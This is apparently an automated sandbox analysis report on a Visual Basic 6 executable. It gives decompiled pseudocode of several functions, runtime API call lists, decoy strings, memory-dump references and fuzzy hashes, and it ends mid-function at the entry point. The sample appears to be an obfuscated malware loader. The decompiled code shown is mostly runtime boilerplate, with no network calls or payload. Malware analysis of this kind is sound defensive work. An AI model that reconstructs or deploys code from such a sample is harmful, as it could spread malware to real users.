__vbaFreeStr.MSVBVM60(00000000,?,00000000,?,0041F05D), ref: 0041F047
__vbaFreeVar.MSVBVM60(00000000,?,00000000,?,0041F05D), ref: 0041F04F
__vbaFreeStr.MSVBVM60(00000000,?,00000000,?,0041F05D), ref: 0041F057

Strings

Koaguleringerne7, xrefs: 0041E40D
Bakteriers, xrefs: 0041DF51
Apparat5, xrefs: 0041EEB5
Hvepsetaljer, xrefs: 0041E8C1
Calelectricity, xrefs: 0041D5A7
phrontisterium, xrefs: 0041D4E2
Tosdede8, xrefs: 0041D464
INDUSTRIALIZING, xrefs: 0041ED44
STYRETABELLER, xrefs: 0041D5AF
Bovlamme1, xrefs: 0041D206
2, xrefs: 0041E3FF
T, xrefs: 0041DE19
Unecliptic9, xrefs: 0041D20B
Tvivlsomst9, xrefs: 0041D691
stivstikkere, xrefs: 0041D21C
Zombie3, xrefs: 0041EEA8

Memory Dump Source

Source File: 00000000.00000002.1191410623.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1191406489.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1191427193.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1191433235.0000000000424000.00000002.00020000.sdmp Download File

Similarity

API ID: __vba$Free$CheckHresult$New2$List$Move$CopyError$CallLateSystem$Ansi$Destruct$#517#618#692#711#712#717ChkstkPrintVar2
String ID: 2$Apparat5$Bakteriers$Bovlamme1$Calelectricity$Hvepsetaljer$INDUSTRIALIZING$Koaguleringerne7$STYRETABELLER$Tosdede8$Tvivlsomst9$Unecliptic9$Zombie3$phrontisterium$stivstikkere$T
API String ID: 2704859531-1304991006
Opcode ID: ecbe9e708c361ddfd270ca477771b949e3124a256d23f26c57d85ab5c6433cdc
Instruction ID: fe61c0d62e537998394f150188b8a8990317dfc09ace25468cb21965a98085c8
Opcode Fuzzy Hash: ecbe9e708c361ddfd270ca477771b949e3124a256d23f26c57d85ab5c6433cdc
Instruction Fuzzy Hash: A103F671940229AFDB20DF61CC45FDDB7B8BB08304F1044EAE50ABB2A1DB795A85DF58

Uniqueness

Uniqueness Score: -1.00%

Function 0041F4AD, Relevance: 68.6, APIs: 35, Strings: 4, Instructions: 358
COMMON

Download Yara Rule

C-Code - Quality: 58%

			E0041F4AD(void* __ebx, void* __ecx, void* __edi, void* __esi, void* _a12) {
				intOrPtr _v8;
				intOrPtr _v12;
				short _v24;
				short* _v36;
				char _v48;
				void* _v56;
				char _v60;
				void* _v64;
				char _v68;
				intOrPtr* _v72;
				signed int _v76;
				intOrPtr* _v84;
				signed int _v88;
				intOrPtr* _v92;
				signed int _v96;
				intOrPtr* _v100;
				signed int _v104;
				intOrPtr* _v108;
				signed int _v112;
				intOrPtr* _v116;
				signed int _v120;
				intOrPtr* _v124;
				signed int _v128;
				intOrPtr* _v132;
				signed int _v136;
				char* _t170;
				signed int _t174;
				char* _t179;
				signed int _t183;
				char* _t188;
				signed int _t192;
				signed int _t193;
				char* _t198;
				signed int _t202;
				signed int _t203;
				signed int _t205;
				char* _t210;
				signed int _t214;
				signed int _t215;
				char* _t220;
				signed int _t224;
				signed int _t225;
				char* _t230;
				signed int _t234;
				char* _t237;
				intOrPtr _t286;

				_push(0x401356);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t286;
				_push(0x74);
				L00401350();
				_v12 = _t286;
				_v8 = 0x401260;
				L004014E2();
				_push(2);
				_push(0x403ebc);
				_push( &_v48);
				L004014B8();
				_push(L"Eksperimenternes");
				_push(L"Finansierings");
				_push(L"Confabulatory");
				_push(L"ministerstormens"); // executed
				L004014B2(); // executed
				if( *0x422010 != 0) {
					_v84 = 0x422010;
				} else {
					_push(0x422010);
					_push(0x403270);
					L00401578();
					_v84 = 0x422010;
				}
				_t170 =  &_v60;
				L00401566();
				_v72 = _t170;
				_t174 =  *((intOrPtr*)( *_v72 + 0x1f0))(_v72,  &_v64, _t170,  *((intOrPtr*)( *((intOrPtr*)( *_v84)) + 0x2fc))( *_v84));
				asm("fclex");
				_v76 = _t174;
				if(_v76 >= 0) {
					_v88 = _v88 & 0x00000000;
				} else {
					_push(0x1f0);
					_push(0x403c88);
					_push(_v72);
					_push(_v76);
					L00401572();
					_v88 = _t174;
				}
				 *_v36 = _v64;
				L0040156C();
				if( *0x422010 != 0) {
					_v92 = 0x422010;
				} else {
					_push(0x422010);
					_push(0x403270);
					L00401578();
					_v92 = 0x422010;
				}
				_t179 =  &_v60;
				L00401566();
				_v72 = _t179;
				_t183 =  *((intOrPtr*)( *_v72 + 0x98))(_v72,  &_v64, _t179,  *((intOrPtr*)( *((intOrPtr*)( *_v92)) + 0x30c))( *_v92));
				asm("fclex");
				_v76 = _t183;
				if(_v76 >= 0) {
					_v96 = _v96 & 0x00000000;
				} else {
					_push(0x98);
					_push(0x403cf4);
					_push(_v72);
					_push(_v76);
					L00401572();
					_v96 = _t183;
				}
				 *((short*)(_v36 + 2)) = _v64;
				L0040156C();
				if( *0x422010 != 0) {
					_v100 = 0x422010;
				} else {
					_push(0x422010);
					_push(0x403270);
					L00401578();
					_v100 = 0x422010;
				}
				_t188 =  &_v60;
				L00401566();
				_v72 = _t188;
				_t192 =  *((intOrPtr*)( *_v72 + 0x178))(_v72,  &_v64, _t188,  *((intOrPtr*)( *((intOrPtr*)( *_v100)) + 0x308))( *_v100));
				asm("fclex");
				_v76 = _t192;
				if(_v76 >= 0) {
					_v104 = _v104 & 0x00000000;
				} else {
					_push(0x178);
					_push(0x403cf4);
					_push(_v72);
					_push(_v76);
					L00401572();
					_v104 = _t192;
				}
				_t193 = 2;
				 *((short*)(_v36 + (_t193 << 1))) = _v64;
				L0040156C();
				if( *0x422010 != 0) {
					_v108 = 0x422010;
				} else {
					_push(0x422010);
					_push(0x403270);
					L00401578();
					_v108 = 0x422010;
				}
				_t198 =  &_v60;
				L00401566();
				_v72 = _t198;
				_t202 =  *((intOrPtr*)( *_v72 + 0x98))(_v72,  &_v64, _t198,  *((intOrPtr*)( *((intOrPtr*)( *_v108)) + 0x30c))( *_v108));
				asm("fclex");
				_v76 = _t202;
				if(_v76 >= 0) {
					_v112 = _v112 & 0x00000000;
				} else {
					_push(0x98);
					_push(0x403cf4);
					_push(_v72);
					_push(_v76);
					L00401572();
					_v112 = _t202;
				}
				_t203 = 2;
				 *((short*)(_v36 + _t203 * 3)) = _v64;
				L0040156C();
				_t205 = 2;
				 *((short*)(_v36 + (_t205 << 2))) = 0x1b7c;
				if( *0x422010 != 0) {
					_v116 = 0x422010;
				} else {
					_push(0x422010);
					_push(0x403270);
					L00401578();
					_v116 = 0x422010;
				}
				_t210 =  &_v60;
				L00401566();
				_v72 = _t210;
				_t214 =  *((intOrPtr*)( *_v72 + 0x168))(_v72,  &_v64, _t210,  *((intOrPtr*)( *((intOrPtr*)( *_v116)) + 0x2fc))( *_v116));
				asm("fclex");
				_v76 = _t214;
				if(_v76 >= 0) {
					_v120 = _v120 & 0x00000000;
				} else {
					_push(0x168);
					_push(0x403c88);
					_push(_v72);
					_push(_v76);
					L00401572();
					_v120 = _t214;
				}
				_t215 = 2;
				 *((short*)(_v36 + _t215 * 5)) = _v64;
				L0040156C();
				if( *0x422010 != 0) {
					_v124 = 0x422010;
				} else {
					_push(0x422010);
					_push(0x403270);
					L00401578();
					_v124 = 0x422010;
				}
				_t220 =  &_v60;
				L00401566();
				_v72 = _t220;
				_t224 =  *((intOrPtr*)( *_v72 + 0xf8))(_v72,  &_v64, _t220,  *((intOrPtr*)( *((intOrPtr*)( *_v124)) + 0x308))( *_v124));
				asm("fclex");
				_v76 = _t224;
				if(_v76 >= 0) {
					_v128 = _v128 & 0x00000000;
				} else {
					_push(0xf8);
					_push(0x403cf4);
					_push(_v72);
					_push(_v76);
					L00401572();
					_v128 = _t224;
				}
				_t225 = 2;
				 *((short*)(_v36 + _t225 * 6)) = _v64;
				L0040156C();
				L004014AC();
				if( *0x422010 != 0) {
					_v132 = 0x422010;
				} else {
					_push(0x422010);
					_push(0x403270);
					L00401578();
					_v132 = 0x422010;
				}
				_t230 =  &_v60;
				L00401566();
				_v72 = _t230;
				_t234 =  *((intOrPtr*)( *_v72 + 0x168))(_v72,  &_v64, _t230,  *((intOrPtr*)( *((intOrPtr*)( *_v132)) + 0x2fc))( *_v132));
				asm("fclex");
				_v76 = _t234;
				if(_v76 >= 0) {
					_v136 = _v136 & 0x00000000;
				} else {
					_push(0x168);
					_push(0x403c88);
					_push(_v72);
					_push(_v76);
					L00401572();
					_v136 = _t234;
				}
				_v24 = _v64;
				L0040156C();
				_push(0x41f97f);
				_v68 =  &_v48;
				_t237 =  &_v68;
				_push(_t237);
				_push(0);
				L004014D6();
				L00401554();
				return _t237;
			}

0x0041f4b2
0x0041f4bd
0x0041f4be
0x0041f4c5
0x0041f4c8
0x0041f4d0
0x0041f4d3
0x0041f4e0
0x0041f4e5
0x0041f4e7
0x0041f4ef
0x0041f4f0
0x0041f4f5
0x0041f4fa
0x0041f4ff
0x0041f504
0x0041f509
0x0041f515
0x0041f52f
0x0041f517
0x0041f517
0x0041f51c
0x0041f521
0x0041f526
0x0041f526
0x0041f54a
0x0041f54e
0x0041f553
0x0041f562
0x0041f568
0x0041f56a
0x0041f571
0x0041f58d
0x0041f573
0x0041f573
0x0041f578
0x0041f57d
0x0041f580
0x0041f583
0x0041f588
0x0041f588
0x0041f598
0x0041f59e
0x0041f5aa
0x0041f5c4
0x0041f5ac
0x0041f5ac
0x0041f5b1
0x0041f5b6
0x0041f5bb
0x0041f5bb
0x0041f5df
0x0041f5e3
0x0041f5e8
0x0041f5f7
0x0041f5fd
0x0041f5ff
0x0041f606
0x0041f622
0x0041f608
0x0041f608
0x0041f60d
0x0041f612
0x0041f615
0x0041f618
0x0041f61d
0x0041f61d
0x0041f62d
0x0041f634
0x0041f640
0x0041f65a
0x0041f642
0x0041f642
0x0041f647
0x0041f64c
0x0041f651
0x0041f651
0x0041f675
0x0041f679
0x0041f67e
0x0041f68d
0x0041f693
0x0041f695
0x0041f69c
0x0041f6b8
0x0041f69e
0x0041f69e
0x0041f6a3
0x0041f6a8
0x0041f6ab
0x0041f6ae
0x0041f6b3
0x0041f6b3
0x0041f6be
0x0041f6c8
0x0041f6cf
0x0041f6db
0x0041f6f5
0x0041f6dd
0x0041f6dd
0x0041f6e2
0x0041f6e7
0x0041f6ec
0x0041f6ec
0x0041f710
0x0041f714
0x0041f719
0x0041f728
0x0041f72e
0x0041f730
0x0041f737
0x0041f753
0x0041f739
0x0041f739
0x0041f73e
0x0041f743
0x0041f746
0x0041f749
0x0041f74e
0x0041f74e
0x0041f759
0x0041f764
0x0041f76b
0x0041f772
0x0041f779
0x0041f786
0x0041f7a0
0x0041f788
0x0041f788
0x0041f78d
0x0041f792
0x0041f797
0x0041f797
0x0041f7bb
0x0041f7bf
0x0041f7c4
0x0041f7d3
0x0041f7d9
0x0041f7db
0x0041f7e2
0x0041f7fe
0x0041f7e4
0x0041f7e4
0x0041f7e9
0x0041f7ee
0x0041f7f1
0x0041f7f4
0x0041f7f9
0x0041f7f9
0x0041f804
0x0041f80f
0x0041f816
0x0041f822
0x0041f83c
0x0041f824
0x0041f824
0x0041f829
0x0041f82e
0x0041f833
0x0041f833
0x0041f857
0x0041f85b
0x0041f860
0x0041f86f
0x0041f875
0x0041f877
0x0041f87e
0x0041f89a
0x0041f880
0x0041f880
0x0041f885
0x0041f88a
0x0041f88d
0x0041f890
0x0041f895
0x0041f895
0x0041f8a0
0x0041f8ab
0x0041f8b2
0x0041f8b7
0x0041f8c3
0x0041f8dd
0x0041f8c5
0x0041f8c5
0x0041f8ca
0x0041f8cf
0x0041f8d4
0x0041f8d4
0x0041f8f8
0x0041f8fc
0x0041f901
0x0041f910
0x0041f916
0x0041f918
0x0041f91f
0x0041f93e
0x0041f921
0x0041f921
0x0041f926
0x0041f92b
0x0041f92e
0x0041f931
0x0041f936
0x0041f936
0x0041f949
0x0041f950
0x0041f955
0x0041f968
0x0041f96b
0x0041f96e
0x0041f96f
0x0041f971
0x0041f979
0x0041f97e

APIs

__vbaChkstk.MSVBVM60(?,00401356), ref: 0041F4C8
__vbaStrCopy.MSVBVM60(?,?,?,?,00401356), ref: 0041F4E0
__vbaAryConstruct2.MSVBVM60(?,00403EBC,00000002,?,?,?,?,00401356), ref: 0041F4F0
#690.MSVBVM60(ministerstormens,Confabulatory,Finansierings,Eksperimenternes,?,00403EBC,00000002,?,?,?,?,00401356), ref: 0041F509
__vbaNew2.MSVBVM60(00403270,00422010,ministerstormens,Confabulatory,Finansierings,Eksperimenternes,?,00403EBC,00000002,?,?,?,?,00401356), ref: 0041F521
__vbaObjSet.MSVBVM60(?,00000000,?,?,?,?,?,?,ministerstormens,Confabulatory,Finansierings,Eksperimenternes,?,00403EBC,00000002), ref: 0041F54E
__vbaHresultCheckObj.MSVBVM60(00000000,?,00403C88,000001F0,?,?,?,?,?,?,ministerstormens,Confabulatory,Finansierings,Eksperimenternes,?,00403EBC), ref: 0041F583
__vbaFreeObj.MSVBVM60(?,?,?,?,?,?,ministerstormens,Confabulatory,Finansierings,Eksperimenternes,?,00403EBC,00000002), ref: 0041F59E
__vbaNew2.MSVBVM60(00403270,00422010,?,?,?,?,?,?,ministerstormens,Confabulatory,Finansierings,Eksperimenternes,?,00403EBC,00000002), ref: 0041F5B6
__vbaObjSet.MSVBVM60(?,00000000,?,?,?,?,?,?,?,?,ministerstormens,Confabulatory,Finansierings,Eksperimenternes,?,00403EBC), ref: 0041F5E3
__vbaHresultCheckObj.MSVBVM60(00000000,?,00403CF4,00000098,?,?,?,?,?,?,?,?,ministerstormens,Confabulatory,Finansierings,Eksperimenternes), ref: 0041F618
__vbaFreeObj.MSVBVM60(?,?,?,?,?,?,?,?,ministerstormens,Confabulatory,Finansierings,Eksperimenternes,?,00403EBC,00000002), ref: 0041F634
__vbaNew2.MSVBVM60(00403270,00422010,?,?,?,?,?,?,?,?,ministerstormens,Confabulatory,Finansierings,Eksperimenternes,?,00403EBC), ref: 0041F64C
__vbaObjSet.MSVBVM60(?,00000000,?,?,?,?,?,?,?,?,?,?,ministerstormens,Confabulatory,Finansierings,Eksperimenternes), ref: 0041F679
__vbaHresultCheckObj.MSVBVM60(00000000,?,00403CF4,00000178,?,?,?,?,?,?,?,?,?,?,ministerstormens,Confabulatory), ref: 0041F6AE
__vbaFreeObj.MSVBVM60(?,?,?,?,?,?,?,?,?,?,ministerstormens,Confabulatory,Finansierings,Eksperimenternes,?,00403EBC), ref: 0041F6CF
__vbaNew2.MSVBVM60(00403270,00422010,?,?,?,?,?,?,?,?,?,?,ministerstormens,Confabulatory,Finansierings,Eksperimenternes), ref: 0041F6E7
__vbaObjSet.MSVBVM60(?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,ministerstormens,Confabulatory), ref: 0041F714
__vbaHresultCheckObj.MSVBVM60(00000000,?,00403CF4,00000098), ref: 0041F749
__vbaFreeObj.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?,ministerstormens,Confabulatory,Finansierings,Eksperimenternes), ref: 0041F76B
__vbaNew2.MSVBVM60(00403270,00422010,?,?,?,?,?,?,?,?,?,?,?,?,ministerstormens,Confabulatory), ref: 0041F792
__vbaObjSet.MSVBVM60(?,00000000), ref: 0041F7BF
__vbaHresultCheckObj.MSVBVM60(00000000,?,00403C88,00000168), ref: 0041F7F4
__vbaFreeObj.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,ministerstormens,Confabulatory), ref: 0041F816
__vbaNew2.MSVBVM60(00403270,00422010), ref: 0041F82E
__vbaObjSet.MSVBVM60(?,00000000), ref: 0041F85B
__vbaHresultCheckObj.MSVBVM60(00000000,?,00403CF4,000000F8), ref: 0041F890
__vbaFreeObj.MSVBVM60(00000000,?,00403CF4,000000F8), ref: 0041F8B2
#598.MSVBVM60(00000000,?,00403CF4,000000F8), ref: 0041F8B7
__vbaNew2.MSVBVM60(00403270,00422010), ref: 0041F8CF
__vbaObjSet.MSVBVM60(?,00000000), ref: 0041F8FC
__vbaHresultCheckObj.MSVBVM60(00000000,?,00403C88,00000168), ref: 0041F931
__vbaFreeObj.MSVBVM60(00000000,?,00403C88,00000168), ref: 0041F950
__vbaAryDestruct.MSVBVM60(00000000,?,0041F97F), ref: 0041F971
__vbaFreeStr.MSVBVM60(00000000,?,0041F97F), ref: 0041F979

Strings

Finansierings, xrefs: 0041F4FA
Eksperimenternes, xrefs: 0041F4F5
ministerstormens, xrefs: 0041F504
Confabulatory, xrefs: 0041F4FF

Memory Dump Source

Source File: 00000000.00000002.1191410623.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1191406489.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1191427193.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1191433235.0000000000424000.00000002.00020000.sdmp Download File

Similarity

API ID: __vba$Free$CheckHresultNew2$#598#690ChkstkConstruct2CopyDestruct
String ID: Confabulatory$Eksperimenternes$Finansierings$ministerstormens
API String ID: 2817960149-3291121498
Opcode ID: 046ea5f8e04e5426fd135b7eec8b3dcff49f7371e8813219eed7931e35686489
Instruction ID: 83d806749950d113b87b8bf9422a012f36da00d08a949dabf19ff67202219ccf
Opcode Fuzzy Hash: 046ea5f8e04e5426fd135b7eec8b3dcff49f7371e8813219eed7931e35686489
Instruction Fuzzy Hash: 42E10975A40208EFCB10EFA0D945FDDBBB5BF48705F20403AE502BB2A1DB795946DB58

Uniqueness

Uniqueness Score: -1.00%

Function 004212ED, Relevance: 15.1, APIs: 10, Instructions: 102
COMMON

Download Yara Rule

C-Code - Quality: 54%

			E004212ED(void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi, intOrPtr* _a4, intOrPtr _a8) {
				intOrPtr _v8;
				intOrPtr _v12;
				char _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				char _v36;
				intOrPtr _v44;
				intOrPtr _v52;
				intOrPtr _v60;
				intOrPtr _v68;
				char _v72;
				signed int _v76;
				signed int _v84;
				signed int _v88;
				signed int _t50;
				signed int _t62;
				void* _t67;
				void* _t74;
				intOrPtr _t76;

				_t67 = __edx;
				 *[fs:0x0] = _t76;
				L00401350();
				_v12 = _t76;
				_v8 = 0x401330;
				L004013FE();
				_t50 =  *((intOrPtr*)( *_a4 + 0x58))(_a4,  &_v72,  &_v24, _a4, __edi, __esi, __ebx, 0x44,  *[fs:0x0], 0x401356, __ecx, __ecx, _t74);
				asm("fclex");
				_v76 = _t50;
				if(_v76 >= 0) {
					_v84 = _v84 & 0x00000000;
				} else {
					_push(0x58);
					_push(0x4038ec);
					_push(_a4);
					_push(_v76);
					L00401572();
					_v84 = _t50;
				}
				_v32 = _v72;
				L004013FE();
				L004013F8();
				_v28 = E004215B9( &_v36);
				L0040156C();
				_v32 = E004215B9(_v28) + 0x2b0;
				E00421725(_t67, _v32, _a8);
				_v60 = 0x80020004;
				_v68 = 0xa;
				_v44 = 0x80020004;
				_v52 = 0xa;
				L00401350();
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				L00401350();
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_t62 =  *((intOrPtr*)( *_a4 + 0x2b0))(_a4, 0x10, 0x10,  &_v36,  &_v36, _a4);
				asm("fclex");
				_v76 = _t62;
				if(_v76 >= 0) {
					_v88 = _v88 & 0x00000000;
				} else {
					_push(0x2b0);
					_push(0x4038ec);
					_push(_a4);
					_push(_v76);
					L00401572();
					_v88 = _t62;
				}
				_push(0x421430);
				L0040156C();
				return _t62;
			}

0x004212ed
0x004212fe
0x00421308
0x00421310
0x00421313
0x00421321
0x00421332
0x00421335
0x00421337
0x0042133e
0x00421357
0x00421340
0x00421340
0x00421342
0x00421347
0x0042134a
0x0042134d
0x00421352
0x00421352
0x0042135e
0x00421368
0x00421371
0x0042137c
0x00421382
0x00421394
0x0042139d
0x004213a2
0x004213a9
0x004213b0
0x004213b7
0x004213c1
0x004213cb
0x004213cc
0x004213cd
0x004213ce
0x004213d2
0x004213dc
0x004213dd
0x004213de
0x004213df
0x004213e8
0x004213ee
0x004213f0
0x004213f7
0x00421413
0x004213f9
0x004213f9
0x004213fe
0x00421403
0x00421406
0x00421409
0x0042140e
0x0042140e
0x00421417
0x0042142a
0x0042142f

APIs

__vbaChkstk.MSVBVM60(?,00401356), ref: 00421308
__vbaObjSetAddref.MSVBVM60(?,?,?,?,?,?,00401356), ref: 00421321
__vbaHresultCheckObj.MSVBVM60(00000000,?,004038EC,00000058), ref: 0042134D
__vbaObjSetAddref.MSVBVM60(?,?), ref: 00421368
#644.MSVBVM60(?,?,?), ref: 00421371
__vbaFreeObj.MSVBVM60(00000000,?,?,?), ref: 00421382
__vbaChkstk.MSVBVM60(?,?,?,00000000,?,?,?), ref: 004213C1
__vbaChkstk.MSVBVM60(?,?,?,00000000,?,?,?), ref: 004213D2
__vbaHresultCheckObj.MSVBVM60(00000000,?,004038EC,000002B0), ref: 00421409
__vbaFreeObj.MSVBVM60(00421430), ref: 0042142A

Memory Dump Source

Source File: 00000000.00000002.1191410623.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1191406489.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1191427193.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1191433235.0000000000424000.00000002.00020000.sdmp Download File

Similarity

API ID: __vba$Chkstk$AddrefCheckFreeHresult$#644
String ID:
API String ID: 1032928638-0
Opcode ID: 4ce07d1c982af1019ec6ff9d0f6542b7b5f436586010dcf07459b637f057b834
Instruction ID: 5c1e5480e805a4bc08eda242305b745f728d8fa222d16c6aa68a65bf2b44940c
Opcode Fuzzy Hash: 4ce07d1c982af1019ec6ff9d0f6542b7b5f436586010dcf07459b637f057b834
Instruction Fuzzy Hash: 8A4126B1900218EFDF01EF91D846BDEBBB9FF14744F50402AF901BB1A1C7B99A469B58

Uniqueness

Uniqueness Score: -1.00%

Function 0041F07C, Relevance: 13.6, APIs: 9, Instructions: 76
COMMON

Download Yara Rule

C-Code - Quality: 52%

			E0041F07C(void* __ebx, void* __ecx, void* __edi, void* __esi) {
				intOrPtr _v8;
				intOrPtr _v12;
				void* _v24;
				char _v28;
				intOrPtr _v36;
				char _v44;
				char _v64;
				intOrPtr* _v68;
				signed int _v72;
				intOrPtr* _v80;
				signed int _v84;
				char* _t34;
				signed int _t38;
				char* _t40;
				intOrPtr _t55;

				_push(0x401356);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t55;
				_push(0x40);
				L00401350();
				_v12 = _t55;
				_v8 = 0x401238;
				if( *0x422010 != 0) {
					_v80 = 0x422010;
				} else {
					_push(0x422010);
					_push(0x403270);
					L00401578();
					_v80 = 0x422010;
				}
				_t34 =  &_v28;
				L00401566();
				_v68 = _t34;
				_t38 =  *((intOrPtr*)( *_v68 + 0x58))(_v68,  &_v64, _t34,  *((intOrPtr*)( *((intOrPtr*)( *_v80)) + 0x2fc))( *_v80));
				asm("fclex");
				_v72 = _t38;
				if(_v72 >= 0) {
					_v84 = _v84 & 0x00000000;
				} else {
					_push(0x58);
					_push(0x403c88);
					_push(_v68);
					_push(_v72);
					L00401572();
					_v84 = _t38;
				}
				_v36 = _v64;
				_v44 = 3;
				_push(0xfffffffe);
				_push(0xfffffffe);
				_push(0xfffffffe);
				_push(0xffffffff);
				_t40 =  &_v44;
				_push(_t40); // executed
				L004014D0(); // executed
				L00401560();
				L0040156C();
				L0040157E();
				_push(0x41f17f);
				L00401554();
				return _t40;
			}

0x0041f081
0x0041f08c
0x0041f08d
0x0041f094
0x0041f097
0x0041f09f
0x0041f0a2
0x0041f0b0
0x0041f0ca
0x0041f0b2
0x0041f0b2
0x0041f0b7
0x0041f0bc
0x0041f0c1
0x0041f0c1
0x0041f0e5
0x0041f0e9
0x0041f0ee
0x0041f0fd
0x0041f100
0x0041f102
0x0041f109
0x0041f122
0x0041f10b
0x0041f10b
0x0041f10d
0x0041f112
0x0041f115
0x0041f118
0x0041f11d
0x0041f11d
0x0041f129
0x0041f12c
0x0041f133
0x0041f135
0x0041f137
0x0041f139
0x0041f13b
0x0041f13e
0x0041f13f
0x0041f149
0x0041f151
0x0041f159
0x0041f15e
0x0041f179
0x0041f17e

APIs

__vbaChkstk.MSVBVM60(?,00401356), ref: 0041F097
__vbaNew2.MSVBVM60(00403270,00422010,?,?,?,?,00401356), ref: 0041F0BC
__vbaObjSet.MSVBVM60(?,00000000), ref: 0041F0E9
__vbaHresultCheckObj.MSVBVM60(00000000,?,00403C88,00000058), ref: 0041F118
#704.MSVBVM60(00000003,000000FF,000000FE,000000FE,000000FE), ref: 0041F13F
__vbaStrMove.MSVBVM60(00000003,000000FF,000000FE,000000FE,000000FE), ref: 0041F149
__vbaFreeObj.MSVBVM60(00000003,000000FF,000000FE,000000FE,000000FE), ref: 0041F151
__vbaFreeVar.MSVBVM60(00000003,000000FF,000000FE,000000FE,000000FE), ref: 0041F159
__vbaFreeStr.MSVBVM60(0041F17F,00000003,000000FF,000000FE,000000FE,000000FE), ref: 0041F179

Memory Dump Source

Source File: 00000000.00000002.1191410623.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1191406489.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1191427193.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1191433235.0000000000424000.00000002.00020000.sdmp Download File

Similarity

API ID: __vba$Free$#704CheckChkstkHresultMoveNew2
String ID:
API String ID: 2174863854-0
Opcode ID: 91172d906b4538833fddaf15542c17ea83e93aca9b9cf968e5c0b2332a3c0290
Instruction ID: c75ee9ebe4ae94afc0f3ec227cfa194210bbf57d8482d38e6f22c2dc05c88e6e
Opcode Fuzzy Hash: 91172d906b4538833fddaf15542c17ea83e93aca9b9cf968e5c0b2332a3c0290
Instruction Fuzzy Hash: D6312870900208BBCB10DF95CD46FDDBBB9AB08714F20422AF112B71E0DB785946CB58

Uniqueness

Uniqueness Score: -1.00%

Function 00421443, Relevance: 10.6, APIs: 7, Instructions: 54
COMMON

Download Yara Rule

C-Code - Quality: 94%

			E00421443(void* __ebx, void* __edi, void* __esi, intOrPtr* _a4, signed int* _a8) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				char _v40;
				char _v72;
				char _v88;
				intOrPtr _v96;
				intOrPtr _v104;
				char* _t33;
				void* _t36;
				void* _t46;
				void* _t48;
				intOrPtr _t49;

				_t49 = _t48 - 0xc;
				 *[fs:0x0] = _t49;
				L00401350();
				_v16 = _t49;
				_v12 = 0x401340;
				_v8 = 0;
				 *((intOrPtr*)( *_a4 + 4))(_a4, __edi, __esi, __ebx, 0x58,  *[fs:0x0], 0x401356, _t46);
				 *_a8 =  *_a8 & 0x00000000;
				E0042163B();
				_v96 = 2;
				_v104 = 2;
				L004013F2();
				_v96 = 0x808b36;
				_v104 = 3;
				L004013F2();
				_t33 =  &_v88;
				L004013EC();
				L00401506();
				_t36 =  *((intOrPtr*)( *_a4 + 0x72c))(_a4, _t33, _t33, _t33,  &_v40,  &_v72);
				_push(0x421519);
				L0040157E();
				L0040157E();
				return _t36;
			}

0x00421446
0x00421455
0x0042145f
0x00421467
0x0042146a
0x00421471
0x00421480
0x00421486
0x00421489
0x0042148e
0x00421495
0x004214a2
0x004214a7
0x004214ae
0x004214bb
0x004214c8
0x004214cc
0x004214d2
0x004214e0
0x004214e6
0x0042150b
0x00421513
0x00421518

APIs

__vbaChkstk.MSVBVM60(?,00401356), ref: 0042145F

Part of subcall function 0042163B: __vbaChkstk.MSVBVM60(?,0042148E,?,?,?,?,00401356), ref: 00421641
Part of subcall function 0042163B: #644.MSVBVM60(?,?,0042148E,?,?,?,?,00401356), ref: 0042166B

__vbaVarMove.MSVBVM60 ref: 004214A2
__vbaVarMove.MSVBVM60 ref: 004214BB
__vbaVarIdiv.MSVBVM60(?,?,?), ref: 004214CC
__vbaI4Var.MSVBVM60(00000000,?,?,?), ref: 004214D2
__vbaFreeVar.MSVBVM60(00421519), ref: 0042150B
__vbaFreeVar.MSVBVM60(00421519), ref: 00421513

Memory Dump Source

Source File: 00000000.00000002.1191410623.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1191406489.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1191427193.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1191433235.0000000000424000.00000002.00020000.sdmp Download File

Similarity

API ID: __vba$ChkstkFreeMove$#644Idiv
String ID:
API String ID: 1258935826-0
Opcode ID: 57b61fe5c9b08e7767641a8c740bd3c2768821c617ec12088e2de7936dcb9f3c
Instruction ID: 3c6bc5f144d0ba79401fbb2dc12c35f690089c02ca757586d820b145a3362727
Opcode Fuzzy Hash: 57b61fe5c9b08e7767641a8c740bd3c2768821c617ec12088e2de7936dcb9f3c
Instruction Fuzzy Hash: 5711C971900308AFDB01EFD5C986BCEBBB8EF44744F50846AF406AB1A1D778AA05CF94

Uniqueness

Uniqueness Score: -1.00%

Function 004015A8, Relevance: 3.8, APIs: 1, Strings: 1, Instructions: 296
COMMON

Download Yara Rule

C-Code - Quality: 88%

			_entry_(signed int __eax, signed char __ebx, void* __edx, void* __edi, signed int __esi) {
				signed int _t28;
				signed int _t29;
				signed int _t31;
				signed int _t32;
				signed int _t33;
				signed int _t37;
				intOrPtr* _t39;
				intOrPtr* _t42;
				signed int _t44;
				signed int _t48;
				signed int _t49;
				void* _t51;

				_t34 = __ebx;
